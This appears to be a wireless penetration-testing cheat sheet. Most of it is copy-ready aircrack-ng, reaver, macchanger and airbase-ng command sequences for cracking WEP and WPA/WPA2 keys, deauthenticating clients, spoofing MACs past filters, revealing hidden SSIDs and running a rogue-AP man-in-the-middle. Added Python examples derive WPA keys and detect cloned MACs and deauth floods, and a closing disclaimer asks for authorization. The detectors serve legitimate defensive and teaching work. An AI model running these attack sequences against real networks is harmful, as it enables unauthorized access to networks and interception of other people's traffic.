In the world of cybersecurity, wireless networks are a common target for attackers. To effectively defend against such threats, it’s crucial to understand how wireless penetration testing works. This cheat sheet provides an overview of essential techniques and commands used in wireless penetration testing.
WIRELESS ANTENNA
Enabling Monitor Mode
Monitor mode is essential for capturing wireless traffic. To enable it, follow these commands:
root@denizhalil:~# ifconfig wlan0mon down
root@denizhalil:~# iwconfig wlan0mon mode monitor
root@denizhalil:~# ifconfig wlan0mon up
Increasing Wi-Fi TX Power
Boosting Wi-Fi transmission power can improve signal strength. Use these commands, but be aware of regulatory limitations:
root@denizhalil:~# iw reg set B0
root@denizhalil:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
# txpower is commonly set to 30
# The permitted txpower depends on your country's regulations; check them first
root@denizhalil:~# iwconfig
Changing Wi-Fi Channel
Changing the Wi-Fi channel can help avoid interference. Use this command to set the channel:
root@denizhalil:~# iwconfig wlan0 channel <SetChannel(1-14)>
WEP CRACKING
Method 1: Fake Authentication Attack
WEP cracking involves multiple methods. Here’s the first one, using a fake authentication attack:
root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
# Find your MAC address
root@denizhalil:~# macchanger --show wlan0mon
root@denizhalil:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
root@denizhalil:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <BSSID> -h <OurMac> wlan0mon
root@denizhalil:~# aircrack-ng -b <BSSID> <PCAP_of_FileName>
Method 2: ARP Replay Attack
Here’s the second method, using an ARP replay attack:
root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
# Find your MAC address
root@denizhalil:~# macchanger --show wlan0mon
root@denizhalil:~# aireplay-ng -3 -x 1000 -n 1000 -b <BSSID> -h <OurMac> wlan0mon
root@denizhalil:~# aircrack-ng -b <BSSID> <PCAP_of_FileName>
Method 3: Chop Chop Attack
For the third method, you can use the Chop Chop attack:
root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
# Find your MAC address
root@denizhalil:~# macchanger --show wlan0mon
root@denizhalil:~# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
root@denizhalil:~# aireplay-ng -4 -b <BSSID> -h <OurMac> wlan0mon
# Press 'y' when prompted
root@denizhalil:~# packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@denizhalil:~# aireplay-ng -2 -r <FileName2> wlan0mon
root@denizhalil:~# aircrack-ng <PCAP_of_FileName>
Method 4: Fragmentation Attack
The fourth method involves a fragmentation attack:
root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
# Find your MAC address
root@denizhalil:~# macchanger --show wlan0mon
root@denizhalil:~# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
root@denizhalil:~# aireplay-ng -5 -b <BSSID> -h <OurMac> wlan0mon
# Press 'y' when prompted
root@denizhalil:~# packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@denizhalil:~# aireplay-ng -2 -r <FileName2> wlan0mon
root@denizhalil:~# aircrack-ng <PCAP_of_FileName>
Method 5: SKA (Shared Key Authentication) Type Cracking
For the fifth method, use the SKA type cracking approach:
root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@denizhalil:~# aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
root@denizhalil:~# ifconfig wlan0mon down
root@denizhalil:~# macchanger --mac <VictimMac> wlan0mon
root@denizhalil:~# ifconfig wlan0mon up
root@denizhalil:~# aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon
root@denizhalil:~# aireplay-ng --deauth 1 -a <BSSID> -h <FakedMac> wlan0mon
root@denizhalil:~# aircrack-ng <PCAP_of_FileName>
WPA / WPA2 CRACKING
Method 1: WPS Attack
WPA and WPA2 cracking can be achieved using a WPS attack:
root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# apt-get install reaver
root@denizhalil:~# wash -i wlan0mon -C
root@denizhalil:~# reaver -i wlan0mon -b <BSSID> -vv -S
# Or, a specific attack
root@denizhalil:~# reaver -i wlan0mon -c <Channel> -b <BSSID> -p <PinCode> -vv -S
Method 2: Dictionary Attack
WPA and WPA2 passwords can also be cracked using a dictionary attack:
root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@denizhalil:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
root@denizhalil:~# aircrack-ng -w <WordlistFile> -b <BSSID> <Handshaked_PCAP>
Method 3: Crack with John The Ripper
John The Ripper can be used for WPA/WPA2 password cracking:
root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@denizhalil:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
root@denizhalil:~# cd /pentest/passwords/john
root@denizhalil:~# ./john --wordlist=<Wordlist> --rules --stdout | aircrack-ng -0 -e <ESSID> -w - <PCAP_of_FileName>

Method 4: Crack with coWPAtty
Use coWPAtty for WPA/WPA2 password cracking:
root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@denizhalil:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
root@denizhalil:~# cowpatty -r <PCAP_of_FileName> -f <Wordlist> -2 -s <SSID>
# Or precompute the hashes for this SSID first, then use them
root@denizhalil:~# genpmk -s <SSID> -f <Wordlist> -d <HashesFileName>
root@denizhalil:~# cowpatty -r <PCAP_of_FileName> -d <HashesFileName> -2 -s <SSID>
Method 5: Crack with Pyrit
Pyrit can also be used for WPA/WPA2 password cracking:
root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@denizhalil:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
root@denizhalil:~# pyrit -r <PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough
root@denizhalil:~# pyrit -i <Wordlist> import_passwords
root@denizhalil:~# pyrit -e <ESSID> create_essid
root@denizhalil:~# pyrit batch
root@denizhalil:~# pyrit -r <PCAP_of_FileName> attack_db
Method 6: Precomputed WPA Keys Database Attack
Another method involves a precomputed WPA keys database attack:
root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@denizhalil:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
# Put the target ESSID into ESSID.txt
root@denizhalil:~# kwrite ESSID.txt
root@denizhalil:~# airolib-ng NEW_DB --import essid ESSID.txt
root@denizhalil:~# airolib-ng NEW_DB --import passwd <DictionaryFile>
root@denizhalil:~# airolib-ng NEW_DB --clean all
root@denizhalil:~# airolib-ng NEW_DB --stats
root@denizhalil:~# airolib-ng NEW_DB --batch
root@denizhalil:~# airolib-ng NEW_DB --verify all
root@denizhalil:~# aircrack-ng -r NEW_DB <Handshaked_PCAP>
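What genpmk, pyrit batch and airolib-ng --batch precompute is the WPA/WPA2 Pairwise Master Key, PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), and because the SSID is the salt every table is bound to one exact SSID. The Python below is an added example, not code from the original cheat sheet or from any of these tools; the list of default SSIDs in it is constructed, and the known-answer check uses the test vector published in IEEE 802.11i Annex H. The defensive reading: a non-default SSID invalidates every off-the-shelf table, and the 4096 iterations make each candidate passphrase expensive, so passphrase length is what actually protects the network.

```python
import hashlib

PBKDF2_ITERATIONS = 4096  # fixed by the WPA/WPA2-Personal standard
PMK_LENGTH = 32           # bytes

# Constructed stand-in for the default SSIDs that published PMK tables
# are typically built for (real lists are far longer).
COMMON_DEFAULT_SSIDS = {"linksys", "NETGEAR", "default", "dlink", "TP-LINK"}


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32 bytes) per IEEE 802.11i.
    This is the expensive step that a precomputed table caches."""
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode(), ssid.encode(), PBKDF2_ITERATIONS, PMK_LENGTH
    )


def table_is_reusable(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """True only if the PMK computed for ssid_a also matches ssid_b.
    Since the SSID is the PBKDF2 salt this is False for any two distinct
    SSIDs: a table built for one network says nothing about another."""
    return derive_pmk(passphrase, ssid_a) == derive_pmk(passphrase, ssid_b)


def exposed_to_precomputed_tables(ssid: str) -> bool:
    """Defensive check for an AP audit: a network still using a common
    default SSID can be tested with tables that already exist, so the
    passphrase alone carries the whole load. Renaming the SSID forces a
    fresh 4096-iteration computation per candidate."""
    return ssid in COMMON_DEFAULT_SSIDS
```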
FIND HIDDEN SSID
Discovering a hidden SSID requires specific steps:
root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng -c <Channel> --bssid <BSSID> wlan0mon
root@denizhalil:~# aireplay-ng -0 20 -a <BSSID> -c <VictimMac> wlan0mon

BYPASS MAC FILTERING
To bypass MAC filtering, follow these steps:
root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@denizhalil:~# aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
root@denizhalil:~# ifconfig wlan0mon down
root@denizhalil:~# macchanger --mac <VictimMac> wlan0mon
root@denizhalil:~# ifconfig wlan0mon up
root@denizhalil:~# aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon
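MAC filtering fails against the macchanger step above because the filter only sees the address field, but two radios sharing one MAC cannot share one 802.11 sequence-number counter. The Python below is an added example, not part of the original cheat sheet, showing the classic detection: per transmitter MAC, flag repeated large jumps in the 12-bit sequence number. The frame records and MAC addresses are constructed.

```python
from collections import defaultdict

SEQ_MOD = 4096  # 802.11 sequence numbers are 12 bits and wrap around

# Constructed frame records (timestamp, transmitter MAC, sequence number).
# The legitimate client 11:22:33:44:55:66 counts 1500, 1501, ... while a
# second radio that has cloned its MAC counts from 37, so the two
# independent counters interleave on the air.
FRAMES = [
    (0.00, "11:22:33:44:55:66", 1500),
    (0.02, "11:22:33:44:55:66", 1501),
    (0.03, "aa:bb:cc:dd:ee:01", 9),
    (0.05, "11:22:33:44:55:66", 37),
    (0.06, "11:22:33:44:55:66", 1502),
    (0.07, "aa:bb:cc:dd:ee:01", 10),
    (0.08, "11:22:33:44:55:66", 38),
    (0.09, "11:22:33:44:55:66", 1503),
    (0.10, "aa:bb:cc:dd:ee:01", 11),
]


def seq_gap(prev: int, cur: int) -> int:
    """Forward distance from prev to cur modulo 4096 (wraparound-safe)."""
    return (cur - prev) % SEQ_MOD


def find_cloned_macs(frames, max_gap=64, min_anomalies=2):
    """Return {mac: anomaly_count} for MACs whose sequence numbers jump by
    more than max_gap at least min_anomalies times. A single radio advances
    in small steps (gap 0 is a retransmission, a few missed frames give a
    small gap); two radios behind one MAC produce repeated large jumps."""
    last = {}
    anomalies = defaultdict(int)
    for _, mac, seq in frames:
        if mac in last and seq_gap(last[mac], seq) > max_gap:
            anomalies[mac] += 1
        last[mac] = seq
    return {m: n for m, n in anomalies.items() if n >= min_anomalies}
```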
MAN IN THE MIDDLE ATTACK
Performing a man-in-the-middle attack requires several steps:
root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airbase-ng -e "<FakeESSID>" wlan0mon
root@denizhalil:~# brctl addbr <VariableName>
root@denizhalil:~# brctl addif <VariableName> wlan0mon
root@denizhalil:~# brctl addif <VariableName> at0
root@denizhalil:~# ifconfig eth0 0.0.0.0 up
root@denizhalil:~# ifconfig at0 0.0.0.0 up
root@denizhalil:~# ifconfig <VariableName> up
root@denizhalil:~# aireplay-ng --deauth 0 -a <victimBSSID> wlan0mon
root@denizhalil:~# dhclient3 <VariableName> &
root@denizhalil:~# wireshark &
# Select the <VariableName> interface in Wireshark
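Nearly every procedure above (handshake capture for the dictionary, John, coWPAtty and Pyrit methods, hidden-SSID discovery, MAC filter bypass and the rogue-AP man-in-the-middle) starts with an aireplay-ng -0 deauthentication burst, which is also the loudest step on the air and the one a WIDS catches first. The Python below is an added example, not part of the original cheat sheet: a sliding-window deauth-flood detector run over a constructed capture summary. The one-frame-per-line format, the MAC addresses and the thresholds are assumptions; a real feed would come from a monitor-mode capture exported as fields.

```python
from collections import defaultdict, deque

# Constructed capture summary, one frame per line:
#   <relative time> <frame subtype> <bssid> <destination> <reason code>
# Subtype 12 = deauthentication, 8 = beacon, "-" = no reason field.
# The burst from 00:11:22:33:44:55 to the broadcast address mimics an injected
# deauth flood; the single reason-3 frame from the other AP is a normal
# "station is leaving" deauthentication and must not alert.
CAPTURE = """\
0.000 8 00:11:22:33:44:55 ff:ff:ff:ff:ff:ff -
0.102 8 00:11:22:33:44:55 ff:ff:ff:ff:ff:ff -
0.150 12 00:11:22:33:44:55 ff:ff:ff:ff:ff:ff 7
0.151 12 00:11:22:33:44:55 ff:ff:ff:ff:ff:ff 7
0.152 12 00:11:22:33:44:55 ff:ff:ff:ff:ff:ff 7
0.153 12 00:11:22:33:44:55 ff:ff:ff:ff:ff:ff 7
0.154 12 00:11:22:33:44:55 ff:ff:ff:ff:ff:ff 7
0.155 12 00:11:22:33:44:55 ff:ff:ff:ff:ff:ff 7
0.204 8 66:77:88:99:aa:bb ff:ff:ff:ff:ff:ff -
3.900 12 66:77:88:99:aa:bb 11:22:33:44:55:66 3
"""

DEAUTH = 12
BROADCAST = "ff:ff:ff:ff:ff:ff"


def parse_capture(text):
    """Yield (time, subtype, bssid, dst, reason) tuples from the summary lines."""
    for line in text.splitlines():
        t, subtype, bssid, dst, reason = line.split()
        yield float(t), int(subtype), bssid, dst, reason


def detect_deauth_flood(text, window=1.0, threshold=5):
    """Return {bssid: (max_frames_in_window, broadcast)} for every BSSID that
    sent at least `threshold` deauthentication frames within `window` seconds.
    `broadcast` is True when a frame in the burst targets ff:ff:ff:ff:ff:ff,
    i.e. kicks every client at once, which a legitimate AP almost never does."""
    recent = defaultdict(deque)   # bssid -> deque of (time, dst) inside the window
    alerts = {}
    for t, subtype, bssid, dst, _ in parse_capture(text):
        if subtype != DEAUTH:
            continue
        q = recent[bssid]
        q.append((t, dst))
        while q and t - q[0][0] > window:
            q.popleft()
        if len(q) >= threshold:
            peak = max(len(q), alerts.get(bssid, (0, False))[0])
            alerts[bssid] = (peak, any(d == BROADCAST for _, d in q))
    return alerts
```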
Please note that this cheat sheet is provided for educational purposes, and ethical considerations should be observed when conducting wireless penetration testing. Unauthorized access to wireless networks is illegal and unethical. Always obtain proper authorization before performing any penetration testing activities.